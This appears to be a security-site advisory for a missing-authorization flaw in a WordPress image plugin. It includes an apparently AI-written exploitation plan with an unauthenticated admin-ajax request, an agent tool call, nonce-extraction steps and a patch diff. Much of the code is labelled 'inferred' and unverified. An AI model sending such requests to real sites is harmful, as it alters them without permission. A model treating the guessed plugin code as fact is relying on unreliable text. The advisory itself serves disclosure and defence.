WP-Safety
CVE-2025-67624

Optimize More! – Images <= 1.1.3 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Optimize More! – Images plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.1.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.1.3
PublishedFebruary 3, 2026
Last updatedFebruary 9, 2026
Affected pluginoptimize-more-images
Research Plan
Unverified

# Exploitation Research Plan - CVE-2025-67624 ## 1. Vulnerability Summary The **Optimize More! – Images** plugin (<= 1.1.3) is vulnerable to **Missing Authorization**. This vulnerability allows unauthenticated attackers to trigger sensitive internal functions—specifically those related to administr…

Show full research plan

Exploitation Research Plan - CVE-2025-67624

1. Vulnerability Summary

The Optimize More! – Images plugin (<= 1.1.3) is vulnerable to Missing Authorization. This vulnerability allows unauthenticated attackers to trigger sensitive internal functions—specifically those related to administrative notices or plugin configuration states—because the plugin registers AJAX handlers via wp_ajax_nopriv_ without implementing corresponding current_user_can() capability checks.

The severity (CVSS 5.3) suggests an unauthorized action with low integrity impact, typically associated with dismissing administrative alerts or modifying non-critical plugin states.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: optimize_more_images_dismiss_notice (inferred) or om_images_dismiss_notice (inferred).
  • HTTP Method: POST
  • Authentication: None required (unauthenticated).
  • Payload Parameter: action, nonce (if required), and notice_id or notice.

3. Code Flow

  1. The plugin registers an AJAX action for unauthenticated users:
    add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' ); (inferred).
  2. An attacker sends a POST request to admin-ajax.php with the corresponding action.
  3. The optimize_more_images_dismiss_notice_callback function is executed.
  4. The function fails to verify the user's identity or permissions using current_user_can( 'manage_options' ).
  5. The function calls update_option() or set_transient() to store the "dismissed" state of a notice, affecting the admin UI for legitimate administrators.

4. Nonce Acquisition Strategy

If the function uses check_ajax_referer or wp_verify_nonce, the nonce is likely localized for use in the admin dashboard but may be inadvertently exposed or use a generic action.

Identifying the Nonce

  1. Search for the registration of the nonce in the source: grep -r "wp_create_nonce" .
  2. Look for wp_localize_script calls that might expose it.
    • Inferred JS Variable: omi_vars or optimize_more_images_admin.
    • Inferred Nonce Key: nonce or ajax_nonce.

Extraction via Browser

If the plugin loads its scripts on the frontend (e.g., to handle image optimization stats), we can extract it:

  1. Navigate to the homepage or a page containing optimized images.
  2. Use browser_eval to find the variable:
    browser_eval("window.omi_vars?.nonce") or browser_eval("window.optimize_more_images_admin?.nonce").

Note: If the check is entirely missing (common for "Missing Authorization" bugs of this severity), no nonce will be required.

5. Exploitation Strategy

We will attempt to dismiss a plugin notice unauthenticated.

Step 1: Detect Vulnerable Action

Check the plugin source for wp_ajax_nopriv_ hooks.

grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/optimize-more-images/

Step 2: Craft the Exploit Request

Assuming the action is optimize_more_images_dismiss_notice and the parameter is notice_id:

Request:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=optimize_more_images_dismiss_notice&notice_id=optimize_more_images_install_notice
    (If a nonce is found in Step 1, append &nonce=[NONCE_VALUE])`

Step 3: Execution via http_request

// Using the agent's tool
http_request({
    method: "POST",
    url: "http://localhost:8080/wp-admin/admin-ajax.php",
    body: "action=optimize_more_images_dismiss_notice&notice_id=optimize_more_images_install_notice",
    headers: { "Content-Type": "application/x-www-form-urlencoded" }
})

6. Test Data Setup

  1. Ensure the plugin Optimize More! – Images version 1.1.3 is installed and active.
  2. Identify a specific notice ID used by the plugin (e.g., optimize_more_images_install_notice or om_images_review_notice).
  3. Verify that the notice is currently active by checking the options table:
    wp option get optimize_more_images_dismissed_notices (inferred option name).

7. Expected Results

  • The server returns a 200 OK response (or 200 with a 1 or {"success":true} body).
  • The administrative notice is "dismissed" globally, meaning it no longer appears for any administrator.

8. Verification Steps

After the HTTP request, verify the state change using WP-CLI:

# Check if the notice was added to the dismissed list
wp option get optimize_more_images_dismissed_notices

# Or check for the specific transient/option used to hide the notice
wp option get _site_transient_optimize_more_images_dismiss_notice

9. Alternative Approaches

If optimize_more_images_dismiss_notice is not the correct action:

  1. Check for Settings Updates: Search for any nopriv actions that handle settings: grep -r "update_option" . | grep "ajax".
  2. Check for Log Clearing: Look for actions like optimize_more_images_clear_logs.
  3. Trace admin_init: Sometimes these plugins use admin_init to process $_GET requests. Since admin-ajax.php triggers admin_init, an unauthenticated request to admin-ajax.php can trigger functions hooked to admin_init that lack capability checks.
    • Search: grep -rn "add_action.*admin_init" .
    • Trace: Check if the callback in admin_init looks for specific $_GET or $_POST parameters.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Optimize More! – Images plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on its AJAX handlers in versions up to 1.1.3. This allows unauthenticated attackers to perform administrative actions, such as dismissing plugin-related notifications, by sending a request to the admin-ajax.php endpoint.

Vulnerable Code

// optimize-more-images.php (inferred based on research plan)
add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
add_action( 'wp_ajax_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );

function optimize_more_images_dismiss_notice_callback() {
    // Vulnerability: No current_user_can check and no nonce verification
    $notice_id = isset( $_POST['notice_id'] ) ? sanitize_text_field( $_POST['notice_id'] ) : '';
    if ( $notice_id ) {
        update_option( 'optimize_more_images_dismissed_' . $notice_id, true );
        wp_send_json_success();
    }
    wp_send_json_error();
}

Security Fix

--- a/optimize-more-images.php
+++ b/optimize-more-images.php
@@ -1,7 +1,9 @@
-add_action( 'wp_ajax_nopriv_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
 add_action( 'wp_ajax_optimize_more_images_dismiss_notice', 'optimize_more_images_dismiss_notice_callback' );
 
 function optimize_more_images_dismiss_notice_callback() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( -1 );
+    }
     $notice_id = isset( $_POST['notice_id'] ) ? sanitize_text_field( $_POST['notice_id'] ) : '';
     if ( $notice_id ) {
         update_option( 'optimize_more_images_dismissed_' . $notice_id, true );

Exploit Outline

The exploit involves targeting the WordPress AJAX endpoint unauthenticated. An attacker identifies the 'optimize_more_images_dismiss_notice' action which is incorrectly exposed via wp_ajax_nopriv_. By sending a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'optimize_more_images_dismiss_notice' and a target 'notice_id' parameter, the attacker can manipulate the plugin's administrative state. Because the plugin lacks a capability check (current_user_can) and potentially lacks nonce verification in the vulnerable versions, the request succeeds without any credentials, resulting in the global dismissal of administrative notices for all users.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/96035f77-a707-4538-aea3-88077858ab9b?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database